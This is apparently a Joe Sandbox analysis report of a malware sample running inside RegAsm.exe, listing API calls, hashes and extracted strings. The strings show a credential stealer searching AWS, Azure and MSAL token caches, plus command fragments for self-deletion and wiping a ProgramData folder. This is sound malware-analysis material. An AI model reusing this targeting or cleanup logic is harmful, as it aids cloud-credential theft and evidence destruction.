                                                • Part of subcall function 004176DE: _EH_prolog.MSVCRT ref: 004176E3
                                                • Part of subcall function 004176DE: wsprintfA.USER32 ref: 00417703
                                                • Part of subcall function 004176DE: FindFirstFileA.KERNEL32(?,?), ref: 0041771A
                                                • Part of subcall function 004176DE: StrCmpCA.SHLWAPI(?,004279C8), ref: 00417737
                                                • Part of subcall function 004176DE: StrCmpCA.SHLWAPI(?,004279CC), ref: 00417751
                                                • Part of subcall function 004176DE: wsprintfA.USER32 ref: 00417775
                                                • Part of subcall function 004176DE: StrCmpCA.SHLWAPI(?,004276CF), ref: 00417786
                                                • Part of subcall function 004176DE: wsprintfA.USER32 ref: 004177A3
                                                • Part of subcall function 004176DE: PathMatchSpecA.SHLWAPI(?,?), ref: 004177CA
                                                • Part of subcall function 004176DE: lstrcat.KERNEL32(?,?), ref: 004177F6
                                                • Part of subcall function 004176DE: lstrcat.KERNEL32(?,004279E4), ref: 00417808
                                                • Part of subcall function 004176DE: lstrcat.KERNEL32(?,?), ref: 00417818
                                                • Part of subcall function 004176DE: lstrcat.KERNEL32(?,004279E8), ref: 0041782A
                                                • Part of subcall function 004176DE: lstrcat.KERNEL32(?,?), ref: 0041783E
                                              • memset.MSVCRT ref: 00417C63
                                              • lstrcat.KERNEL32(?,00000000), ref: 00417C8E
                                              • lstrcat.KERNEL32(?,\.aws\), ref: 00417CAB
                                                • Part of subcall function 004176DE: wsprintfA.USER32 ref: 004177B7
                                              • memset.MSVCRT ref: 00417CE6
                                              • lstrcat.KERNEL32(?,00000000), ref: 00417D11
                                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00417D2E
                                                • Part of subcall function 004176DE: FindNextFileA.KERNEL32(00000000,?), ref: 004179D9
                                                • Part of subcall function 004176DE: FindClose.KERNEL32(00000000), ref: 004179E8
                                              • memset.MSVCRT ref: 00417D69
                                                • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$H_prologmemsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                              • API String ID: 2836893066-974132213
                                              • Opcode ID: bf3154184508ba766d60cba5abae36ee97fc9e12e862e1f3cc7bf38aefb6ab98
                                              • Instruction ID: 91e31a7482ef40e223578e2483da43b57a962cebda613e208493a4a00d0a9574
                                              • Opcode Fuzzy Hash: bf3154184508ba766d60cba5abae36ee97fc9e12e862e1f3cc7bf38aefb6ab98
                                              • Instruction Fuzzy Hash: 9941F9B1D4421CBACB00EBB4DC4AEDE777CAB0D304F00455BB144A3182EA7C9B888B65
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                              • API String ID: 0-2933911573
                                              • Opcode ID: 73eeb4afabb081657a4dcfff5c69205a6f197cc898f6b184f06bfb1ea0f62b21
                                              • Instruction ID: 7265d75eef107a503ae7dbfa973833bcfc8e572fb52e72491d078eb84769afd3
                                              • Opcode Fuzzy Hash: 73eeb4afabb081657a4dcfff5c69205a6f197cc898f6b184f06bfb1ea0f62b21
                                              • Instruction Fuzzy Hash: 7EA18DF6A413065FDB005F28AC83BEA7799DF41A11F444165EC889F282E66BE10FC7B5
                                              Strings
                                              • NULL, xrefs: 1B6A2E38
                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B6A2E69
                                              • invalid, xrefs: 1B6A2E4E
                                              • %s at line %d of [%.10s], xrefs: 1B6A2E78
                                              • misuse, xrefs: 1B6A2E73
                                              • WHERE name=%Q, xrefs: 1B6A2DB7
                                              • API call with %s database connection pointer, xrefs: 1B6A2E5A
                                              • SELECT * FROM (SELECT 'sqlite_schema' AS name,1 AS rootpage,'table' AS type UNION ALL SELECT name,rootpage,type FROM "%w".sqlite_schema WHERE rootpage!=0), xrefs: 1B6A2DA4
                                              • ORDER BY name, xrefs: 1B6A2DCC
                                              • unopened, xrefs: 1B6A2E55
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ORDER BY name$%s at line %d of [%.10s]$API call with %s database connection pointer$NULL$SELECT * FROM (SELECT 'sqlite_schema' AS name,1 AS rootpage,'table' AS type UNION ALL SELECT name,rootpage,type FROM "%w".sqlite_schema WHERE rootpage!=0)$WHERE name=%Q$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
                                              • API String ID: 0-1179878930
                                              • Opcode ID: 4201db30ceb80cf5221a37fd33bcffea15b8d0497ef6ecf6602dccb3f5cac054
                                              • Instruction ID: ce046acea4726b8468259eeb1735f45cdb43c0788f6c0de7c3c17c3867c802c6
                                              • Opcode Fuzzy Hash: 4201db30ceb80cf5221a37fd33bcffea15b8d0497ef6ecf6602dccb3f5cac054
                                              • Instruction Fuzzy Hash: B8C101F09843219BDF109F34CC85BDB77A4AF60715F044429EC9A9B242E735ED8AC7A2
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00409396
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00411944: _EH_prolog.MSVCRT ref: 00411949
                                                • Part of subcall function 00411944: GetSystemTime.KERNEL32(?,004274F0,00000001,000000C8,00000000,0042770F), ref: 00411989
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00409605
                                              • HeapAlloc.KERNEL32(00000000), ref: 0040960C
                                              • lstrcat.KERNEL32(00000000,00000000), ref: 0040972F
                                              • lstrcat.KERNEL32(00000000,00426E34), ref: 0040973D
                                              • lstrcat.KERNEL32(00000000,00000000), ref: 0040974F
                                              • lstrcat.KERNEL32(00000000,00426E38), ref: 0040975D
                                              • lstrlenA.KERNEL32(00000000), ref: 00409870
                                              • lstrlenA.KERNEL32(00000000), ref: 0040987E
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                • Part of subcall function 00415865: _EH_prolog.MSVCRT ref: 0041586A
                                                • Part of subcall function 00415865: CreateThread.KERNEL32(00000000,00000000,00414052,?,00000000,00000000), ref: 00415910
                                                • Part of subcall function 00415865: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00415918
                                              • memset.MSVCRT ref: 004098D6
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prologlstrcat$lstrcpy$lstrlen$Heap$AllocCreateObjectProcessSingleSystemThreadTimeWaitmemset
                                              • String ID:
                                              • API String ID: 1592390033-0
                                              • Opcode ID: 66b2b2354b6e31eb49aeaddc9213c6975f92ba9ecefcf5aa259d2fafae4e7029
                                              • Instruction ID: a2ad9b8be682fbfa14b4219c609b10a199413157f7c19288a990becf1319673b
                                              • Opcode Fuzzy Hash: 66b2b2354b6e31eb49aeaddc9213c6975f92ba9ecefcf5aa259d2fafae4e7029
                                              • Instruction Fuzzy Hash: BE027E31800149EEDF05EBA5DD5AAEEBB75AF15308F10805EF411721E2DFB81A88DF65
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00412B0A
                                              • strtok_s.MSVCRT ref: 00412B3B
                                              • StrCmpCA.SHLWAPI(?,true,?,?,00000104,?,00000104,?,?,00000000), ref: 00412BD3
                                                • Part of subcall function 0041077F: lstrlenA.KERNEL32(?,00000000,?,00417DE8,0042770E,0042770B,00000000,00000000,?,004187CB), ref: 00410788
                                                • Part of subcall function 0041077F: lstrcpy.KERNEL32(00000000,00000000), ref: 004107BC
                                              • lstrcpy.KERNEL32(?,?), ref: 00412C8A
                                              • lstrcpy.KERNEL32(?,00000000), ref: 00412CC6
                                              • lstrcpy.KERNEL32(?,00000000), ref: 00412D0D
                                              • lstrcpy.KERNEL32(?,00000000), ref: 00412D54
                                              • lstrcpy.KERNEL32(?,00000000), ref: 00412D9B
                                              • strtok_s.MSVCRT ref: 00412EFE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpy$strtok_s$H_prologlstrlen
                                              • String ID: false$true
                                              • API String ID: 49562497-2658103896
                                              • Opcode ID: 061990c3b08a0635bf3f4056e9859e76a3b328a685a7464dcc7011e1d9a7acc5
                                              • Instruction ID: 28ff51836035da9e22a5c9aa9de9bbdbf0cb9688c1dfea4d9cbacd6e1c3e0fdf
                                              • Opcode Fuzzy Hash: 061990c3b08a0635bf3f4056e9859e76a3b328a685a7464dcc7011e1d9a7acc5
                                              • Instruction Fuzzy Hash: 44C17F7180020AAFDF14EFA4DD55EDE77BDAB19304F10405AF115E7292FB78AA88CB64
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: automerge$crisismerge$deletemerge$hashsize$pgsz$rank$secure-delete$usermerge
                                              • API String ID: 0-3330941169
                                              • Opcode ID: 9529329ea35c7e96d5c66d71cc31c608cb124cf102bd5ea31dc7ba4cf4aa3992
                                              • Instruction ID: 8a240d737fe895a5231c20282cdadf88b6772189bf5e09b86ee456d2088efa61
                                              • Opcode Fuzzy Hash: 9529329ea35c7e96d5c66d71cc31c608cb124cf102bd5ea31dc7ba4cf4aa3992
                                              • Instruction Fuzzy Hash: 1C7115BAF003115BCB049B39AC419CF7BD1AFD5212F08057AFA46D7211FB25E94AC7A2
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00412F34
                                              • StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,0041812A), ref: 00412F56
                                              • ExitProcess.KERNEL32 ref: 00412F61
                                              • strtok_s.MSVCRT ref: 00412F78
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitH_prologProcessstrtok_s
                                              • String ID: block
                                              • API String ID: 3745986650-2199623458
                                              • Opcode ID: a31ed9966ca09a58ede8d56ec887742dac34a6e19051f4e0500378079127657b
                                              • Instruction ID: efd40a70527ba61e56956edfbf71d9e92ae8c2070f8535f2a0295be01fee5e6e
                                              • Opcode Fuzzy Hash: a31ed9966ca09a58ede8d56ec887742dac34a6e19051f4e0500378079127657b
                                              • Instruction Fuzzy Hash: 1841D778B44305EFD7209FB1EC49AEB3BECAB49746720442BF10BD7550EB7895808B58
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT t.%Q FROM %Q.%Q AS t WHERE t.%Q MATCH '*id'$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such fts5 table: %s.%s$recursive definition for %s.%s
                                              • API String ID: 0-1070437968
                                              • Opcode ID: f32639aa2f949b8e35baf0ec2d23263b49d67d1d571d30337e72bccc27efe3d2
                                              • Instruction ID: e87c4ba0fd62e0f3de350a31148fa9166ba35ab4a78361120d317d44cf25deec
                                              • Opcode Fuzzy Hash: f32639aa2f949b8e35baf0ec2d23263b49d67d1d571d30337e72bccc27efe3d2
                                              • Instruction Fuzzy Hash: 8602DFF09047029FDB108F24EC89BDB77E8BF64619F004529F88997342E771E949CBA2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such function: %s
                                              • API String ID: 0-3900766660
                                              • Opcode ID: 7fa51d867fc149a7c986fe60b377ab85b390353349df70c827fc4ac97da120a1
                                              • Instruction ID: a0e7755e6aff06b9f5debefb02b1082ce5a5c5b28f7c4bf2938175315cae6c15
                                              • Opcode Fuzzy Hash: 7fa51d867fc149a7c986fe60b377ab85b390353349df70c827fc4ac97da120a1
                                              • Instruction Fuzzy Hash: A8E1E3B5A047419BD710CF28DC45BDB77E4BF96614F04052EF8899B381EB35E849C7A2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$cannot open value of type %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$integer$misuse$no such rowid: %lld$null$real
                                              • API String ID: 0-1477268580
                                              • Opcode ID: 42bb42ae947041409f7f9123bf38a92d971df37d8656d42810ae1487b9db2939
                                              • Instruction ID: 45bbda502499e448a4fab44c06d0865485ad0e188502222bd7ba15328bdcf5bd
                                              • Opcode Fuzzy Hash: 42bb42ae947041409f7f9123bf38a92d971df37d8656d42810ae1487b9db2939
                                              • Instruction Fuzzy Hash: E551F0F4A043019FDB109F28EC80AABB3A4FF94705F04092DEA568B741E731E948CBA5
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 004144A1
                                              • memset.MSVCRT ref: 004144C1
                                              • memset.MSVCRT ref: 004144CD
                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 004144E2
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                              • ShellExecuteEx.SHELL32(0000003C), ref: 0041466E
                                              • memset.MSVCRT ref: 0041467B
                                              • memset.MSVCRT ref: 00414689
                                              • ExitProcess.KERNEL32 ref: 0041469A
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcpymemset$H_prolog$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                              • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
                                              • API String ID: 1312519015-206210831
                                              • Opcode ID: ec9f61b1be2bdfd0664f32406c026455f27957cf7463b84261feb8543abe9ea2
                                              • Instruction ID: 1b5373ca0f5b308b8b126a3136e9c0fc33c149a05b0ed5981bb84e1abd997f8a
                                              • Opcode Fuzzy Hash: ec9f61b1be2bdfd0664f32406c026455f27957cf7463b84261feb8543abe9ea2
